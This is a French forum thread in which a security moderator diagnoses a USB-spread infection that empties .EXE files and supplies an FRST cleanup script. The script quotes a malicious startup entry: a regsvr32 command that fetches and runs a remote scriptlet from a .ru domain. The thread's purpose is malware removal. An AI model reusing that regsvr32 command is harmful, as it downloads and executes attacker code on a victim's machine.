Infections virus fichier .EXE à 0 octet
Fermé
Tlondon
-
12 juil. 2019 à 16:19
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 12 juil. 2019 à 16:49
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 12 juil. 2019 à 16:49
A voir également:
- Infections virus fichier .EXE à 0 octet
- Fichier rar - Guide
- Fichier host - Guide
- Fichier iso - Guide
- Comment réduire la taille d'un fichier - Guide
- Ouvrir fichier .bin - Guide
1 réponse
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
Modifié le 12 juil. 2019 à 17:35
Modifié le 12 juil. 2019 à 17:35
Salut,
C'est une infection qui va par USB.
A désinstaller inutile tout ça
Intel Security True Key
McAfee Security Scan Plus
Yahoo! Toolbar
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
C'est une infection qui va par USB.
A désinstaller inutile tout ça
Intel Security True Key
McAfee Security Scan Plus
Yahoo! Toolbar
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Start:
CloseProcesses:
CreateRestorePoint:
C:\boots
HKU\S-1-5-21-1157558165-1950413523-3833716603-1000\...\Run: [syswin] => C:\boots\syswin.exe [4730812 2017-07-25] () [Fichier non signé]
HKU\S-1-5-21-1157558165-1950413523-3833716603-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATTENTION
ShortcutTarget: q.lnk -> C:\Users\HP\AppData\Roaming\eesw0EIW6g.exe ()
C:\Users\HP\AppData\Roaming\eesw0EIW6g.exe
EmptyTemp:
RemoveProxy:
Reboot:
End:
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
